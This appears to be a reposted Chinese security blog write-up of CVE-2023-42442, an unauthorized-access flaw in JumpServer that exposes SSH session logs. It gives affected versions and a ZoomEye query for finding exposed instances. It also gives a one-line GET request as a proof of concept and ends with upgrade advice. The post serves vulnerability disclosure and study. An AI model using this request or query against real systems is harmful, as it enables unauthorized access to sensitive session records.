CVE-2023-42442:JumpServer未授权访问漏洞

admin 2024年5月13日10:09:38评论28 views字数 842阅读2分48秒阅读模式

关注我们❤️,添加星标🌟,一起学安全!
作者:Locks_@Timeline Sec
本文字数:542
阅读时长:1~3min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负

0x01 简介

JumpServer开源堡垒机是一款运维安全审计系统产品,提供身份验证、授权控制、账号管理、安全审计等功能支持,帮助企业快速构建运维安全审计能力。JumpServer开源堡垒机通过企业版或者软硬件一体机的方式,向企业级用户交付开源增值的运维安全审计解决方案。

0x02 漏洞概述

漏洞编号:CVE-2023-42442

该漏洞存在于JumpServer中,是一个未授权访问漏洞。api/api/v1/terminal/sessions/权限控制存在逻辑错误,可以被攻击者匿名访问。未经身份验证的远程攻击者可利用该漏洞下载ssh日志,并可借此远程窃取敏感信息。存储在 S3、OSS 或其他云存储中的ssh会话不受影响。

0x03 影响版本

3.0.0 <= JumpServer <= 3.5.4

3.6.0 <= JumpServer <= 3.6.3

0x04 环境搭建

使用ZoomEye网络空间搜索引擎

zoomeye语法 app:"飞致云堡垒机"

CVE-2023-42442:JumpServer未授权访问漏洞
CVE-2023-42442:JumpServer未授权访问漏洞

0x05 漏洞复现

漏洞POC:

/api/v1/terminal/sessions/

配置请求包

tips:GET请求包要空两行

GET /api/v1/terminal/sessions/ HTTP/1.1
Host: 127.0.0.1


CVE-2023-42442:JumpServer未授权访问漏洞

0x06 修复方式

目前官方已有更新版本,升级至最新版本

下载地址:https://www.jumpserver.org/

推荐服务

CVE-2023-42442:JumpServer未授权访问漏洞

历史漏洞

jumpserver远程命令执行

后台功能

回复【1】领取新人学习资料
回复【
2】进入漏洞查询功能
回复【
3】获取加群方式
回复【
4】领取安全电子书籍

回复5】进入SRC-QQ交流群

商务合作

Timeline Sec团队可合作项目清单

原文始发于微信公众号(Timeline Sec):CVE-2023-42442:JumpServer未授权访问漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月13日10:09:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-42442:JumpServer未授权访问漏洞https://cn-sec.com/archives/2076448.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息